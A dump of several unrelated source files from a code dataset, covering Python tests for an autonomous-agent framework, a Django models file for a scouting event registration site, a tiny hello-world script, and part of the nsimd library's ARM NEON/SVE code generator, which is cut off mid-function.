"config", "set", "agent.default_ledger", "test_ledger", cwd=agent_name
)
result = self.run_cli_command(
"config", "get", "agent.default_ledger", cwd=agent_name
)
assert b"test_ledger" in result.stdout_bytes
diff = self.difference_to_fetched_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
assert diff
assert "test_ledger" in diff[1]
def test_no_diff(self):
"""Test no difference for two aea configs."""
agent_name = "some_agent_for_tests3"
self.fetch_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
diff = self.difference_to_fetched_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
assert not diff
def test_terminate_subprocesses(self):
"""Start and terminate long running python subprocess."""
proc = self.start_subprocess("-c", "import time; time.sleep(10)")
assert proc.returncode is None
self._terminate_subprocesses()
assert proc.returncode is not None
def test_miss_from_output(self):
"""Test subprocess output missing output."""
proc = self.start_subprocess("-c", "print('hi')")
assert len(self.missing_from_output(proc, ["hi"], timeout=5)) == 0
assert "HI" in self.missing_from_output(proc, ["HI"], timeout=5)
def test_replace_file_content(self):
"""Replace content of the file with another one."""
file1 = "file1.txt"
file2 = "file2.txt"
with open(file1, "w") as f:
f.write("hi")
with open(file2, "w") as f:
f.write("world")
self.replace_file_content(Path(file1), Path(file2))
with open(file2, "r") as f:
assert f.read() == "hi"
class TestLoadAgentConfig(AEATestCaseEmpty):
"""Test function 'load_agent_config'."""
def test_load_agent_config(self):
"""Test load_agent_config."""
agent_config = self.load_agent_config(self.agent_name)
assert isinstance(agent_config, AgentConfig)
def test_load_agent_config_when_agent_name_not_exists(self):
"""Test load_agent_config with a wrong agent name."""
wrong_agent_name = "non-existing-agent-name"
with pytest.raises(
AEATestingException,
match=f"Cannot find agent '{wrong_agent_name}' in the current test case.",
):
self.load_agent_config(wrong_agent_name)
class TestAddAndEjectComponent(AEATestCaseEmpty):
"""Test add/reject components."""
def test_add_and_eject(self):
"""Test add/reject components."""
result = self.add_item("skill", str(ECHO_SKILL_PUBLIC_ID), local=True)
assert result.exit_code == 0
result = self.eject_item("skill", str(ECHO_SKILL_PUBLIC_ID))
assert result.exit_code == 0
class TestAddAndRemoveComponent(AEATestCaseEmpty):
"""Test add/remove components."""
def test_add_and_eject(self):
"""Test add/reject components."""
result = self.add_item("skill", str(ECHO_SKILL_PUBLIC_ID), local=True)
assert result.exit_code == 0
result = self.remove_item("skill", str(ECHO_SKILL_PUBLIC_ID))
assert result.exit_code == 0
class TestGenerateAndAddKey(AEATestCaseEmpty):
"""Test generate and add private key."""
def test_generate_and_add_key(self):
"""Test generate and add private key."""
result = self.generate_private_key("cosmos")
assert result.exit_code == 0
result = self.add_private_key(
"cosmos", "cosmos_private_key.txt", connection=True
)
assert result.exit_code == 0
result = self.add_private_key("cosmos", "cosmos_private_key.txt")
assert result.exit_code == 0
result = self.remove_private_key("cosmos")
assert result.exit_code == 0
class TestGetWealth(AEATestCaseEmpty):
"""Test get_wealth."""
def test_get_wealth(self):
"""Test get_wealth."""
# just call it, network related and quite unstable
self.get_wealth(FETCHAI)
class TestAEA(AEATestCase):
"""Test agent test set from path."""
path_to_aea = Path("tests") / "data" / "dummy_aea"
def test_scaffold_and_fingerprint(self):
"""Test component scaffold and fingerprint."""
result = self.scaffold_item("skill", "skill1")
assert result.exit_code == 0
result = self.fingerprint_item("skill", "fetchai/skill1:0.1.0")
assert result.exit_code == 0
def test_scaffold_and_fingerprint_protocol(self):
"""Test component scaffold and fingerprint protocol."""
result = self.scaffold_item("protocol", "protocol1")
assert result.exit_code == 0
result = self.fingerprint_item("protocol", "fetchai/protocol1:0.1.0")
assert result.exit_code == 0
class TestSendReceiveEnvelopesSkill(AEATestCaseEmpty):
"""Test that we can communicate with agent via stub connection."""
def test_send_receive_envelope(self):
"""Run the echo skill sequence."""
self.add_item("skill", str(ECHO_SKILL_PUBLIC_ID))
process = self.run_agent()
is_running = self.is_running(process)
assert is_running, "AEA not running within timeout!"
# add sending and receiving envelope from input/output files
sender = "sender"
def role_from_first_message( # pylint: disable=unused-argument
message: Message, receiver_address: str
) -> Dialogue.Role:
return DefaultDialogue.Role.AGENT
default_dialogues = DefaultDialogues(sender, role_from_first_message)
message_content = b"hello"
message = DefaultMessage(
performative=DefaultMessage.Performative.BYTES,
dialogue_reference=default_dialogues.new_self_initiated_dialogue_reference(),
content=message_content,
)
sent_envelope = Envelope(
to=self.agent_name,
sender=sender,
protocol_id=message.protocol_id,
message=message,
)
self.send_envelope_to_agent(sent_envelope, self.agent_name)
time.sleep(2.0)
received_envelope = self.read_envelope_from_agent(self.agent_name)
received_message = DefaultMessage.serializer.decode(received_envelope.message)
assert sent_envelope.message.content == received_message.content
class TestInvoke(AEATestCaseEmpty):
"""Test invoke method."""
def test_invoke(self):
"""Test invoke method."""
result = self.invoke("--version")
assert result.exit_code == 0
assert f"aea, version {aea.__version__}" in result.stdout
| 1.773438
| 2
|
tangram/models.py
|
gutard/django-tangram
| 0
|
12783488
|
# -*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
BRANCHE_CHOICES = (
(1, u"Lutins"),
(2, u"Louveteaux"),
(3, u"Éclés"),
(4, u"Aînés"),
)
EXPLOGRAM_CHOICES = (
(1, u"Le pont des cultures"),
(2, u"On est cap !"),
(3, u"Filles/garçons"),
(4, u"Au fil du temps"),
)
class Unite(models.Model):
branche = models.IntegerField(u"Branche", choices=BRANCHE_CHOICES)
nom = models.CharField(u"Nom de l'unité/équipage", max_length=100)
inscr_explogram = models.NullBooleanField(u"Nous souhaitons participer à l'ExploGRAM")
inscr_congram = models.NullBooleanField(u"Nous souhaitons participer au ConGRAM")
inscr_tangram = models.NullBooleanField(u"Nous souhaitons participer au rassemblement TanGRAM")
theme_explogram = models.CharField(max_length=100, blank=True)
etat_explogram = models.TextField(u"Descriptif de l'ExploGRAM tel qu'il en est aujourd'hui", blank=True)
effectif = models.PositiveIntegerField(u"Effectif approximatif", blank=True, null=True)
contact = models.CharField(max_length=100, blank=True)
tel = models.CharField(max_length=100, blank=True)
user = models.OneToOneField(User)
fg1_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg1_projet = models.TextField(u"Le projet qu'on rêve de réaliser", blank=True)
fg2_votants = models.CharField(u"Nombre de votants", max_length=100, blank=True)
fg2_resultat = models.CharField(u"Résultats des votes", max_length=100, blank=True)
fg2_elus = models.TextField(u"Sont élus", blank=True)
fg2_adresses = models.TextField(u"Adresses", blank=True)
fg2_propositions = models.TextField(u"Nombre de propositions à présenter", blank=True)
fg3_date = models.CharField(u"Date", max_length=100, blank=True)
fg3_temps = models.TextField(u"Temps consacré", blank=True)
fg3_forme = models.TextField(u"Forme adoptée (conseil, jeux,...)", blank=True)
fg4_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg4_description = models.TextField(u"Le projet qu'on rêve de réaliser", blank=True)
fg4_taches = models.BooleanField(u"Nous avons listé les tâches à faire")
fg4_roles = models.BooleanField(u"Nous nous sommes répartis les rôles")
fg4_partenaire = models.BooleanField(u"Nous allons chercher un partenaire")
fg4_materiel = models.BooleanField(u"Nous avons fait la liste du matériel")
fg4_reunions = models.IntegerField(u"Nombre de réunions de préparation", null=True, blank=True)
fg5_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg5_texte = models.TextField(u"La carte postale de l'exploGRAM", blank=True)
fg5_photo = models.ImageField(u"Photo", blank=True, null=True, upload_to='carte_postale/')
fg6_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg6_date = models.CharField(u"Date", max_length=100, blank=True)
fg6_descriptif = models.TextField(u"Descriptif de notre projet", blank=True)
fg6_positifs = models.TextField(u"Les points positifs de notre projet", blank=True)
fg7_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg7_description = models.TextField(u"Description de notre retransmission", blank=True)
fg7_install = models.CharField(u"Le temps qu'il nous faudra pour l'installer", max_length=100, blank=True)
fg7_presentation = models.CharField(u"Le temps qu'il nous faudra pour le présenter pendant le rassemblement tanGRAM", max_length=100, blank=True)
fg7_espace = models.CharField(u"L'espace qu'il nous faudra", max_length=100, blank=True)
fg7_micro = models.BooleanField(u"Nous aurons besoin d'un micro")
fg7_ecran = models.BooleanField(u"Nous aurons besoin d'un écran")
fg7_expo = models.BooleanField(u"Nous aurons besoin de supports expo")
fg7_autre = models.TextField(u"Nous aurons besoin d'autres choses", blank=True)
fg1_ok = models.BooleanField(u"Gram attribué")
fg2_ok = models.BooleanField(u"Gram attribué")
fg3_ok = models.BooleanField(u"Gram attribué")
fg4_ok = models.BooleanField(u"Gram attribué")
fg5_ok = models.BooleanField(u"Gram attribué")
fg6_ok = models.BooleanField(u"Gram attribué")
fg7_ok = models.BooleanField(u"Gram attribué")
nb_grams = models.IntegerField(u"nombre de grams", default=0)
def save(self, *args, **kwargs):
self.nb_grams = sum([int(getattr(self, 'fg%u_ok' % i)) for i in range(1, 8)])
super(Unite, self).save(*args, **kwargs)
class FicheAction(models.Model):
titre = models.CharField(u"Titre", max_length=100)
par = models.CharField(u"Action réalisée par", max_length=100, blank=True)
public = models.TextField(u"Description public (âge, autonomie, effectif…)", blank=True)
deroule = models.TextField(u"Descriptif du déroulé", blank=True)
activite = models.CharField(u"Type d'activité (grand jeux, forum, projet de longue durée…)", max_length=100, blank=True)
objectifs = models.TextField(u"Objectifs", blank=True)
place = models.TextField(u"Place dans une démarche d'année (lancement, construction, conclusion…)", blank=True)
duree = models.CharField(u"Durée", max_length=100, blank=True)
lancement = models.TextField(u"Place dans les respos dans le lancement", blank=True)
realisation = models.TextField(u"Place dans les respos dans la réalisation", blank=True)
valorisation = models.TextField(u"Place dans les respos dans la valorisation", blank=True)
biblio = models.TextField(u"Bibliographie", blank=True)
partenaires = models.TextField(u"Les partenaires (si c'est le cas)", blank=True)
matos = models.TextField(u"Besoins matériels", blank=True)
annexe = models.FileField(u"Annexes jointes", blank=True, upload_to='fiche_action')
user = models.ForeignKey(User)
def __unicode__(self):
return self.titre
| 2.046875
| 2
|
hello_git.py
|
zhengwenhong/landsat578-water
| 0
|
12783489
|
<gh_stars>0
print('Hello git, this is <NAME>')
print('Hello git, this is <NAME>')
print('Hello git, this is <NAME>')
print('Hello git, this is <NAME>')
print('Hello git, this is <NAME>')
| 1.875
| 2
|
egg/platform_arm.py
|
TheMartianObserver/nsimd
| 247
|
12783490
|
<reponame>TheMartianObserver/nsimd<filename>egg/platform_arm.py
# Copyright (c) 2020 Agenium Scale
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This file gives the implementation of platform ARM, i.e. ARM SIMD.
# Reading this file is rather straightforward. ARM SIMD extensions are rather
# coherent and consistent. It implements the following architectures:
# - ARMv7 -> 128 bits registers without f16 and f64 support
# - Aarch32 -> 128 bits registers with optional f16 and without f64 support
# - Aarch64 -> 128 bits registers with optional f16 and f64 support
# - SVE -> up to 2048 bits registers
# The first three SIMD extensions are collectively called NEON. Aarch32 and
# Aarch64 correspond respectively to ARMv8 32 and 64 bits chips. Note that
# the ARM documentation says that ARMv7, Aarch32 are different but it seems
# that they differ by only a handful of intrinsics which are not in the scope
# of NSIMD so we have implemented the following:
#
# - ARMv7 \ -> neon128
# - Aarch32 /
# - Aarch64 -> aarch64
# - SVE -> sve
import common
# -----------------------------------------------------------------------------
# Helpers
def neon_typ(typ):
prefix = {'i': 'int', 'u': 'uint', 'f': 'float'}
return '{}{}x{}_t'.format(prefix[typ[0]], typ[1:], 128 // int(typ[1:]))
def half_neon64_typ(typ):
prefix = {'i': 'int', 'u': 'uint', 'f': 'float'}
return '{}{}x{}_t'.format(prefix[typ[0]], typ[1:], 64 // int(typ[1:]))
def sve_typ(typ):
prefix = {'i': 'svint', 'u': 'svuint', 'f': 'svfloat'}
return '{}{}_t'.format(prefix[typ[0]], typ[1:])
def suf(typ):
if typ[0] == 'i':
return 's{}'.format(typ[1:])
else:
return typ
neon = ['neon128', 'aarch64']
fixed_sized_sve = ['sve128', 'sve256', 'sve512', 'sve1024', 'sve2048']
sve = ['sve'] + fixed_sized_sve
fmtspec = {}
def convert_from_predicate(opts, op):
if opts.sve_emulate_bool:
return '''svsel({op},
svdup_n_u{typnbits}_x({svtrue}, (u{typnbits})~0),
svdup_n_u{typnbits}_x({svtrue}, 0))'''. \
format(op=op, **fmtspec)
else:
return op
def convert_to_predicate(opts, op):
if opts.sve_emulate_bool:
# TODO: the casts are a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
return '''svcmpeq({svtrue}, (svuint{typnbits}_t){op},
svdup_n_u{typnbits}_x({svtrue},
(u{typnbits})~0))'''.format(op=op, **fmtspec)
else:
return op
# -----------------------------------------------------------------------------
# Implementation of mandatory functions for this module
def get_simd_exts():
return ['neon128', 'aarch64', 'sve', 'sve128', 'sve256', 'sve512',
'sve1024', 'sve2048']
def get_prev_simd_ext(simd_ext):
if simd_ext in ['neon128', 'aarch64']:
return 'cpu'
elif simd_ext in sve:
return 'aarch64'
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
def emulate_fp16(simd_ext):
if not simd_ext in get_simd_exts():
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
if simd_ext in sve:
return False
else:
return True
def get_type(opts, simd_ext, typ, nsimd_typ):
if simd_ext in neon:
if typ == 'f64':
if simd_ext == 'neon128':
return 'typedef struct {{ double v0; double v1; }} {};'. \
format(nsimd_typ)
else:
return 'typedef {} {};'.format(neon_typ('f64'), nsimd_typ)
elif typ == 'f16':
return '''
#ifdef NSIMD_ARM_FP16
typedef float16x8_t {nsimd_typ};
#else
typedef struct {{ float32x4_t v0; float32x4_t v1; }}
{nsimd_typ};
#endif
'''.format(nsimd_typ=nsimd_typ) # extra \n are necessary
else:
return 'typedef {} {};'.format(neon_typ(typ), nsimd_typ)
elif simd_ext == 'sve':
return 'typedef {} {};'.format(sve_typ(typ), nsimd_typ)
elif simd_ext in fixed_sized_sve:
return 'typedef {} {} __attribute__((arm_sve_vector_bits({})));'. \
format(sve_typ(typ), nsimd_typ, simd_ext[3:])
else:
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
def get_logical_type(opts, simd_ext, typ, nsimd_typ):
if typ not in common.types:
raise ValueError('Unknown type "{}"'.format(typ))
if simd_ext not in get_simd_exts():
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
if typ in common.ftypes + common.itypes:
typ2 = 'u{}'.format(typ[1:]);
else:
typ2 = typ
if simd_ext == 'neon128':
if typ == 'f16':
return \
'''
#ifdef NSIMD_ARM_FP16
typedef uint16x8_t {nsimd_typ};
#else
typedef struct {{ uint32x4_t v0; uint32x4_t v1; }} {nsimd_typ};
#endif
'''.format(nsimd_typ=nsimd_typ) # extra \n are necessary
elif typ == 'f64':
return 'typedef struct {{ u64 v0; u64 v1; }} {};'.format(nsimd_typ)
else:
return get_type(opts, simd_ext, typ2, nsimd_typ)
if simd_ext == 'aarch64':
if typ == 'f16':
return get_logical_type(opts, 'neon128', 'f16', nsimd_typ)
else:
return get_type(opts, simd_ext, typ2, nsimd_typ)
elif simd_ext in sve:
if opts.sve_emulate_bool:
return get_type(opts, simd_ext, 'u' + typ[1:], nsimd_typ)
elif simd_ext in fixed_sized_sve:
return \
'typedef svbool_t {} __attribute__((arm_sve_vector_bits({})));'. \
format(nsimd_typ, simd_ext[3:])
else:
return 'typedef svbool_t {};'.format(nsimd_typ)
def get_nb_registers(simd_ext):
if simd_ext in neon:
return '16'
elif simd_ext in sve:
return '32'
else:
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
def get_native_soa_typ(simd_ext, typ, deg):
prefix = { 'i': 'int', 'u': 'uint', 'f': 'float' }[typ[0]]
if simd_ext in sve:
return 'sv{}x{}_t'.format(prefix + typ[1:], deg)
else:
return '{}{}x{}x{}_t'.format(prefix, typ[1:], 128 // int(typ[1:]),
deg)
def get_SoA_type(simd_ext, typ, deg, nsimd_typ):
if simd_ext != 'sve':
raise ValueError('SIMD extension must be "sve"')
prefix = { 'i': 'int', 'u': 'uint', 'f': 'float' }[typ[0]]
return 'typedef {} {};'.format(get_native_soa_typ(simd_ext, typ, deg),
nsimd_typ)
def has_compatible_SoA_types(simd_ext):
if simd_ext not in neon + sve:
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
return False
# -----------------------------------------------------------------------------
def get_additional_include(func, platform, simd_ext):
ret = '''#include <nsimd/cpu/cpu/{}.h>
'''.format(func)
if simd_ext in sve:
ret += '''#include <nsimd/arm/aarch64/{}.h>
'''.format(func)
if func in ['load2u', 'load3u', 'load4u', 'load2a', 'load3a', 'load4a']:
deg = func[4]
ret += '''#if NSIMD_CXX > 0
extern "C" {{
#endif
NSIMD_INLINE nsimd_{simd_ext}_vu16x{deg}
nsimd_{func}_{simd_ext}_u16(const u16*);
# if NSIMD_CXX > 0
}} // extern "C"
#endif
'''.format(func=func, deg=deg, simd_ext=simd_ext)
if func in ['mask_storea1', 'mask_storeu1', 'masko_loada1',
'masko_loadu1', 'maskz_loada1', 'maskz_loadu1'] and \
simd_ext not in sve:
ret += '''#include <nsimd/scalar_utilities.h>
'''
if func == 'mask_for_loop_tail' and simd_ext not in sve:
ret += '''#include <nsimd/arm/{simd_ext}/set1.h>
#include <nsimd/arm/{simd_ext}/set1l.h>
#include <nsimd/arm/{simd_ext}/iota.h>
#include <nsimd/arm/{simd_ext}/lt.h>
'''.format(simd_ext=simd_ext)
if simd_ext == 'neon128' and func == 'notl':
ret += '''#include <nsimd/arm/neon128/notb.h>
'''
if simd_ext in neon and func == 'ne':
ret += '''#include <nsimd/arm/{simd_ext}/eq.h>
# include <nsimd/arm/{simd_ext}/notl.h>
'''.format(simd_ext=simd_ext)
if simd_ext in neon and func in ['fms', 'fnms']:
ret += '''#include <nsimd/arm/{simd_ext}/ne.h>
#include <nsimd/arm/{simd_ext}/fma.h>
#include <nsimd/arm/{simd_ext}/fnma.h>
'''.format(simd_ext=simd_ext)
if func == 'shra':
ret += '''#include <nsimd/arm/{simd_ext}/shr.h>
'''.format(simd_ext=simd_ext)
if func in ['loadlu', 'loadla']:
ret += '''#include <nsimd/arm/{simd_ext}/eq.h>
# include <nsimd/arm/{simd_ext}/set1.h>
# include <nsimd/arm/{simd_ext}/{load}.h>
# include <nsimd/arm/{simd_ext}/notl.h>
'''.format(load='load' + func[5], simd_ext=simd_ext)
if func in ['storelu', 'storela']:
ret += '''#include <nsimd/arm/{simd_ext}/if_else1.h>
# include <nsimd/arm/{simd_ext}/set1.h>
# include <nsimd/arm/{simd_ext}/{store}.h>
'''.format(store='store' + func[6], simd_ext=simd_ext)
if func == 'to_logical':
ret += '''#include <nsimd/arm/{simd_ext}/reinterpret.h>
#include <nsimd/arm/{simd_ext}/ne.h>
''' .format(simd_ext=simd_ext)
if func == 'zip':
ret += '''#include <nsimd/arm/{simd_ext}/ziplo.h>
#include <nsimd/arm/{simd_ext}/ziphi.h>
'''.format(simd_ext=simd_ext)
if func == 'unzip':
ret += '''#include <nsimd/arm/{simd_ext}/unziplo.h>
#include <nsimd/arm/{simd_ext}/unziphi.h>
'''.format(simd_ext=simd_ext)
if func == 'adds':
ret += '''#include <nsimd/arm/{simd_ext}/add.h>
'''.format(simd_ext=simd_ext)
if func == 'subs':
ret += '''#include <nsimd/arm/{simd_ext}/sub.h>
'''.format(simd_ext=simd_ext)
if func in ['gather', 'scatter'] and simd_ext == 'sve':
ret += '''#include <nsimd/arm/sve/len.h>
'''
return ret
# -----------------------------------------------------------------------------
# Emulators
def emulate_op1(op, simd_ext, typ):
if simd_ext in neon:
le = 128 // int(typ[1:]);
return '''int i;
{typ} buf[{le}];
vst1q_{suf}(buf, {in0});
for (i=0; i < {le}; i += nsimd_len_cpu_{typ}()) {{
nsimd_storeu_cpu_{typ}( & buf[i], nsimd_{op}_cpu_{typ}(
nsimd_loadu_cpu_{typ}(&buf[i])));}}
return vld1q_{suf}(buf); '''. \
format(op=op, le=le, **fmtspec)
if simd_ext in sve:
le = 2048 // int(typ[1:]);
return '''int i;
{typ} buf[{le}];
svst1_{suf}({svtrue}, buf, {in0});
for (i=0; i < simd_len_{simd_ext}_{typ}();
i += nsimd_len_cpu_{typ}()) {{
nsimd_storeu_cpu_{typ}( & buf[i], nsimd_{op}_cpu_{typ}(
nsimd_loadu_cpu_{typ}(&buf[i])));}}
return svld1_{suf}({svtrue}, buf); '''. \
format(op=op, le=le, **fmtspec)
def emulate_op2(op, simd_ext, typ):
if simd_ext in neon:
le = 128 // int(typ[1:]);
return '''int i;
{typ} buf0[{le}], buf1[{le}];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
for (i=0; i < {le}; i++) {{
buf0[i] = ({typ})(buf0[i] {op} buf1[i]);}}
return vld1q_{suf}(buf0); '''. \
format(op=op, le=le, **fmtspec)
if simd_ext in sve:
le = 2048 // int(typ[1:]);
return '''int i;
{typ} buf0[{le}], buf1[{le}];
svst1_{suf}({svtrue}, buf0, {in0});
svst1_{suf}({svtrue}, buf1, {in1});
for (i=0; i < nsimd_len_{simd_ext}_{typ}(); i++) {{
buf0[i] = ({typ})(buf0[i] {op} buf1[i]);}}
return svld1_{suf}({svtrue}, buf0); '''. \
format(op=op, le=le, **fmtspec)
def emulate_lop2_neon(opts, op, simd_ext, typ):
le = 128 // int(typ[1:]);
ltyp = get_logical_type(opts, simd_ext, typ)
lsuf = suf(ltyp)
return '''int i;
{ltyp} buf0[{le}], buf1[{le}];
vst1q_{lsuf}(buf0, {in0});
vst1q_{lsuf}(buf1, {in1});
for (i = 0; i < {le}; i++) {{
buf0[i] = buf0[i] {op} buf1[i] ? ({ltyp})-1 : 0;
}}
return vld1q_{lsuf}(buf0);'''. \
format(op=op, le=le, ltyp=ltyp, lsuf=lsuf, **fmtspec)
def emulate_op3_neon(op, simd_ext, typ):
le = 128 // int(typ[1:]);
return '''int i;
{typ} buf0[{le}], buf1[{le}], buf2[{le}];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
vst1q_{suf}(buf2, {in2});
for (i = 0; i < {le}; i += nsimd_len_cpu_{typ}()) {{
nsimd_storeu_cpu_{typ}(&buf0[i], nsimd_{op}_cpu_{typ}(
nsimd_loadu_cpu_{typ}(&buf0[i]),
nsimd_loadu_cpu_{typ}(&buf1[i]),
nsimd_loadu_cpu_{typ}(&buf2[i])));
}}
return vld1q_{suf}(buf0);'''.format(op=op, le=le, **fmtspec)
def emulate_f64_neon(simd_ext, op, params):
fmtspec2 = fmtspec.copy()
fmtspec2['op'] = op
fmtspec2['buf_ret_decl'] = 'nsimd_cpu_{}f64 buf_ret;'. \
format('v' if params[0] == 'v' else 'vl')
fmtspec2['buf_decl'] = '\n'.join(['nsimd_cpu_{}f64 buf{};'. \
format('v' if p[1] == 'v' else 'vl', p[0]) \
for p in common.enum(params[1:])])
fmtspec2['bufs'] = ','.join(['buf{}'.format(i) \
for i in range(0, len(params) - 1)])
fmtspec2['ret_decl'] = 'nsimd_{}_{}f64 ret;'. \
format(simd_ext, 'v' if params[0] == 'v' else 'vl')
buf_set = '\n'.join('''buf{i}.v0 = {ini}.v0;
buf{i}.v1 = {ini}.v1;'''. \
format(i=i, ini=fmtspec['in{}'.format(i)]) \
for i in range(0, len(params) - 1))
return '''{buf_ret_decl}
{buf_decl}
{ret_decl}
{buf_set}
buf_ret = nsimd_{op}_cpu_f64({bufs});
ret.v0 = buf_ret.v0;
ret.v1 = buf_ret.v1;
return ret;'''.format(buf_set=buf_set, **fmtspec2)
# -----------------------------------------------------------------------------
def f16f64(simd_ext, typ, op, armop, arity, forced_intrinsics = ''):
fmtspec2 = fmtspec.copy()
tmpl = ', '.join(['{{in{}}}.v{{{{i}}}}'.format(i).format(**fmtspec) \
for i in range(0, arity)])
fmtspec2['args1'] = tmpl.format(i='0')
fmtspec2['args2'] = tmpl.format(i='1')
fmtspec2['armop'] = armop
fmtspec2['op'] = op
if simd_ext in neon and typ == 'f16':
if forced_intrinsics != '':
fmtspec2['intrinsics'] = forced_intrinsics
else:
temp = ', '.join(['{{in{}}}'.format(i).format(**fmtspec) \
for i in range(0, arity)])
fmtspec2['intrinsics'] = 'return v{}q_f16({});'.format(armop, temp)
return '''#ifdef NSIMD_ARM_FP16
{intrinsics}
#else
nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_{op}_{simd_ext}_f32({args1});
ret.v1 = nsimd_{op}_{simd_ext}_f32({args2});
return ret;
#endif'''.format(**fmtspec2)
elif simd_ext == 'neon128' and typ == 'f64':
return emulate_f64_neon(simd_ext, op, ['v'] * (arity + 1))
return ''
# -----------------------------------------------------------------------------
# Lenghts
def max_len(simd_ext, typ):
if simd_ext == 'sve':
return 2048 // int(typ[1:])
elif simd_ext in fixed_sized_sve:
return int(simd_ext[3:]) // int(typ[1:])
else:
return 128 // int(typ[1:])
def real_len(simd_ext, typ):
if simd_ext == 'sve':
return 'nsimd_len_sve_{typ}()'.format(**fmtspec)
else:
return max_len(simd_ext, typ)
# -----------------------------------------------------------------------------
# Loads of degree 1, 2, 3 and 4
def load1234(opts, simd_ext, typ, deg):
if simd_ext in neon:
if deg == 1:
normal = 'return vld{deg}q_{suf}({in0});'. \
format(deg=deg, **fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
/* Note that we can do much better but is it useful? */
nsimd_{simd_ext}_vf16 ret;
f32 buf[4];
buf[0] = nsimd_u16_to_f32(*(u16*){in0});
buf[1] = nsimd_u16_to_f32(*((u16*){in0} + 1));
buf[2] = nsimd_u16_to_f32(*((u16*){in0} + 2));
buf[3] = nsimd_u16_to_f32(*((u16*){in0} + 3));
ret.v0 = vld1q_f32(buf);
buf[0] = nsimd_u16_to_f32(*((u16*){in0} + 4));
buf[1] = nsimd_u16_to_f32(*((u16*){in0} + 5));
buf[2] = nsimd_u16_to_f32(*((u16*){in0} + 6));
buf[3] = nsimd_u16_to_f32(*((u16*){in0} + 7));
ret.v1 = vld1q_f32(buf);
return ret;
#endif'''.format(normal=normal, **fmtspec)
elif typ == 'f64' and simd_ext == 'neon128':
return \
'''nsimd_neon128_vf64 ret;
ret.v0 = *{in0};
ret.v1 = *({in0} + 1);
return ret;'''.format(**fmtspec)
else:
return normal
else:
normal = \
'''nsimd_{simd_ext}_v{typ}x{deg} ret;
{soa_typ} buf = vld{deg}q_{suf}({in0});
{assignment}
return ret;'''. \
format(deg=deg, soa_typ=get_native_soa_typ(simd_ext, typ, deg),
assignment='\n'.join(['ret.v{i} = buf.val[{i}];'. \
format(i=i) for i in range(0, deg)]), **fmtspec)
if typ == 'f16':
assignment = \
'''vst1q_u16(buf, temp.val[{{i}}]);
ret.v{{i}} = nsimd_loadu_{simd_ext}_f16((f16 *)buf);'''. \
format(**fmtspec)
return \
'''{soa_typ} temp = vld{deg}q_u16((u16 *){in0});
u16 buf[8];
nsimd_{simd_ext}_vf16x{deg} ret;
{assignment}
return ret;'''. \
format(deg=deg, assignment='\n'.join([assignment. \
format(i=i) for i in range(0, deg)]),
soa_typ=get_native_soa_typ(simd_ext, 'u16', deg),
**fmtspec)
elif typ in 'f64' and simd_ext == 'neon128':
return \
'nsimd_neon128_vf64x{} ret;\n'.format(deg) + \
'\n'.join(['ret.v{i}.v0 = *({in0} + {i});'. \
format(i=i, **fmtspec) for i in range(0, deg)]) + \
'\n'.join(['ret.v{i}.v1 = *({in0} + {ipd});'. \
format(i=i, ipd=i + deg, **fmtspec) \
for i in range(0, deg)]) + \
'\nreturn ret;\n'
elif typ in ['i64', 'u64'] and simd_ext == 'neon128':
return \
'''nsimd_neon128_v{typ}x{deg} ret;
{typ} buf[2];'''.format(deg=deg, **fmtspec) + \
'\n'.join(['''buf[0] = *({in0} + {i});
buf[1] = *({in0} + {ipd});
ret.v{i} = vld1q_{suf}(buf);'''. \
format(i=i, ipd=i + deg, **fmtspec) \
for i in range(0, deg)]) + \
'\nreturn ret;\n'
else:
return normal
else:
if deg == 1:
return 'return svld{deg}_{suf}({svtrue}, {in0});'. \
format(deg=deg, **fmtspec)
else:
return \
'''nsimd_{simd_ext}_v{typ}x{deg} ret;
{sve_typ} buf = svld{deg}_{suf}({svtrue}, {in0});
{assignment}
return ret;'''.format(assignment=\
'\n'.join(['ret.v{i} = svget{deg}_{suf}(buf, {i});'. \
format(i=i, deg=deg, **fmtspec) \
for i in range(deg)]),
sve_typ=get_native_soa_typ('sve', typ, deg),
deg=deg, **fmtspec)
# -----------------------------------------------------------------------------
# Mask loads
def maskoz_load(oz, simd_ext, typ):
if simd_ext in sve:
